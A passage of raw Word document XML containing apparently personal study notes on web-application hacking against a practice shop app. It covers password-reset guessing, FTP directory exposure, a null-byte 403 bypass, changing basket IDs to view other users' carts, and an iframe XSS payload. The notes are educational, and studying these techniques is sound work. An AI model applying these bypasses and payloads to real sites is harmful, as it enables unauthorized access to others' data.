        <w:t>Password reset questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482653FD" w14:textId="3317CC56" w:rsidR="001724BD" w:rsidRPr="0084205E" w:rsidRDefault="001724BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>What can be found out about the user?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3306D87C" w14:textId="17229DB2" w:rsidR="001724BD" w:rsidRPr="0084205E" w:rsidRDefault="001724BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hints in comments or profile information?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260876EE" w14:textId="5A11EAA8" w:rsidR="001724BD" w:rsidRPr="0084205E" w:rsidRDefault="001724BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Reset password to your liking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C641CB9" w14:textId="2752E5B6" w:rsidR="001724BD" w:rsidRPr="0084205E" w:rsidRDefault="001724BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Web applications should store/transmit data safely and securely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324343EB" w14:textId="0678EEFF" w:rsidR="001724BD" w:rsidRPr="0084205E" w:rsidRDefault="001724BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If not correctly protected, data can become vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68756D86" w14:textId="1970E7E7" w:rsidR="001724BD" w:rsidRPr="0084205E" w:rsidRDefault="001724BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Data protection is not applied consistently across the web application – certain web pages become accessible to the public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7D4BFB" w14:textId="1D7A51CA" w:rsidR="001724BD" w:rsidRPr="0084205E" w:rsidRDefault="001724BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Information leaked to public without knowledge/permission of developer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A06781" w14:textId="2AAA2B33" w:rsidR="001724BD" w:rsidRPr="0084205E" w:rsidRDefault="00C57F94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Checking out documents offered by web applications may reveal directories in URL which may be vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D480011" w14:textId="175DFFE2" w:rsidR="00C57F94" w:rsidRPr="0084205E" w:rsidRDefault="00C57F94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>FTP for example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2E4D15" w14:textId="2AB11032" w:rsidR="00C57F94" w:rsidRPr="0084205E" w:rsidRDefault="00C57F94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Navigate to such directories by inputting them into the URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C7150B" w14:textId="5DC9D944" w:rsidR="00C57F94" w:rsidRPr="0084205E" w:rsidRDefault="00C57F94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>OSINT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A0DEF2" w14:textId="5C407B93" w:rsidR="00C57F94" w:rsidRPr="0084205E" w:rsidRDefault="00C57F94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Downloading files from FTP directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D1AD04" w14:textId="40E823C5" w:rsidR="00C57F94" w:rsidRPr="0084205E" w:rsidRDefault="00C57F94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Package.json.bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24B116C8" w14:textId="4906A9AE" w:rsidR="00D7568A" w:rsidRPr="0084205E" w:rsidRDefault="00D7568A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Use character bypass called “Poison Null Byte” = %00, URL encoded </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> %2500. Add to end of URL with “.md” extension will bypass 403 error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA85DF7" w14:textId="2741C073" w:rsidR="00D7568A" w:rsidRPr="0084205E" w:rsidRDefault="00D7568A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>NULL terminator which tells server to terminate at a given point, nulling the rest of the string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2080C4FC" w14:textId="647B383E" w:rsidR="00D7568A" w:rsidRPr="0084205E" w:rsidRDefault="00D7568A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Broken Access Control Exploits and Bugs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662993BD" w14:textId="39815160" w:rsidR="00D7568A" w:rsidRPr="0084205E" w:rsidRDefault="00D7568A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Horizontal Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311B95C9" w14:textId="12B5B641" w:rsidR="00D7568A" w:rsidRPr="0084205E" w:rsidRDefault="00D7568A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Access data or perform an action of another user with the same level of permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601D9994" w14:textId="4756E006" w:rsidR="00D7568A" w:rsidRPr="0084205E" w:rsidRDefault="00D7568A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Vertical Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADD2BEE" w14:textId="460E0535" w:rsidR="00D7568A" w:rsidRPr="0084205E" w:rsidRDefault="00D7568A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Perform an action or access data of another user with a higher level of permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EAA217" w14:textId="74AB32C2" w:rsidR="00D7568A" w:rsidRPr="0084205E" w:rsidRDefault="00D7568A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User Debugger on Firefox (Sources in Chrome) – Developers Menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C73E66" w14:textId="568A8371" w:rsidR="00D7568A" w:rsidRPr="0084205E" w:rsidRDefault="00D7568A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Search for JS scripts of importance, such as main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE17865" w14:textId="33BE3636" w:rsidR="00794C75" w:rsidRPr="0084205E" w:rsidRDefault="00794C75" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Find admin related code, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>path:administration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23328F89" w14:textId="598156D3" w:rsidR="00794C75" w:rsidRPr="0084205E" w:rsidRDefault="00794C75" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hints towards /#/administration page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ECC9BF" w14:textId="092E9EC9" w:rsidR="00794C75" w:rsidRPr="0084205E" w:rsidRDefault="00794C75" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Login as admin and navigate to relevant admin pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8E3EF0" w14:textId="23913F8B" w:rsidR="00794C75" w:rsidRPr="0084205E" w:rsidRDefault="00794C75" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">View another </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163F8F9E" w14:textId="37BD1C84" w:rsidR="00794C75" w:rsidRPr="0084205E" w:rsidRDefault="00794C75" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Shopping cart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFBD00A" w14:textId="61D9EF28" w:rsidR="00794C75" w:rsidRPr="0084205E" w:rsidRDefault="00794C75" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Intercept and search GET line for indication of listing for shopping cart object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B8BA96" w14:textId="1E9EDEBB" w:rsidR="00794C75" w:rsidRPr="0084205E" w:rsidRDefault="00794C75" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. GET /rest/</w:t>
      </w:r>
      <w:r w:rsidR="00BF1847" w:rsidRPr="0084205E">
        <w:t>basket/1 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD36B19" w14:textId="2820C217" w:rsidR="00BF1847" w:rsidRPr="0084205E" w:rsidRDefault="00BF1847" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Change the /1 to /2 to test for horizontal escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC2C6CC" w14:textId="0A35A1BE" w:rsidR="00BF1847" w:rsidRPr="0084205E" w:rsidRDefault="00BF1847" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>XSS/Cross-Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468AA8D3" w14:textId="071A7965" w:rsidR="00BF1847" w:rsidRPr="0084205E" w:rsidRDefault="00BF1847" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> within web applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAFDC1A" w14:textId="3C2ECDCB" w:rsidR="00BF1847" w:rsidRPr="0084205E" w:rsidRDefault="00BF1847" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Some of the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>most commonly found</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> bugs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A99C0E8" w14:textId="5C72DA7C" w:rsidR="00BF1847" w:rsidRPr="0084205E" w:rsidRDefault="00BF1847" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ease of discovery varies as each application parses queries differently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D34BABD" w14:textId="0D5695A4" w:rsidR="00BF1847" w:rsidRPr="0084205E" w:rsidRDefault="00BF1847" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Three Major Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB75F96" w14:textId="7EABCE0D" w:rsidR="00BF1847" w:rsidRPr="0084205E" w:rsidRDefault="00BF1847" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>DOM – Document Object Model-based – uses HTML environment to execute malicious JS – commonly uses &lt;script&gt;&lt;/script&gt; HTML tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200CC688" w14:textId="1B48DCF1" w:rsidR="00BF1847" w:rsidRPr="0084205E" w:rsidRDefault="00796AEC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">&lt;iframe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>(‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>’)”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5550CC29" w14:textId="19749AC3" w:rsidR="00796AEC" w:rsidRPr="0084205E" w:rsidRDefault="00796AEC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Put into search bar to get alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2961ED87" w14:textId="6C830146" w:rsidR="00796AEC" w:rsidRPr="0084205E" w:rsidRDefault="00796AEC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Iframe is a common HTML </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>element</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> but others can produce same result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D4BF5B" w14:textId="0FBDCF5A" w:rsidR="00796AEC" w:rsidRPr="0084205E" w:rsidRDefault="00796AEC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>This type of attack is also called XFS – Cross-Frame Scripting – one of the most common forms of detecting XSS within web apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC86BEF" w14:textId="738FEF41" w:rsidR="00796AEC" w:rsidRPr="0084205E" w:rsidRDefault="00796AEC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Websites that allow iframe modification or other DOM elements are likely vulnerable to XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DA8307" w14:textId="72B5E428" w:rsidR="00796AEC" w:rsidRPr="0084205E" w:rsidRDefault="00796AEC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Due to servers sending back related information from a request – without correct sanitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1899A164" w14:textId="5E961AFC" w:rsidR="00BF1847" w:rsidRPr="0084205E" w:rsidRDefault="00BF1847" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Persistent – Server-side, run whenever server loads the page containing it. Can occur when the server does not sanitize the user data when it is uploaded to a page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F961A2D" w14:textId="46FED3A2" w:rsidR="00BF1847" w:rsidRPr="0084205E" w:rsidRDefault="00BF1847" w:rsidP="0084205E">
      <w:pPr>
